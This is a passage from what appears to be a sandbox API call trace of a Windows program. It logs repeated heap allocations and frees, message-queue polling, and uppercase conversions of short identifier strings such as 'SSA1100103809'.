lpMsg=0x8cf3b8) returned 0 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0112.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0112.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0112.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0112.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.749] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0112.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0d8 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0112.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0112.750] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0112.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0112.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0112.750] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0112.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa300 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0112.751] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0112.751] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0112.751] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0112.751] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0112.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0112.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0112.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0112.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0112.752] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0112.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4f8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0112.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0112.753] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0112.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0112.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0112.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.754] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 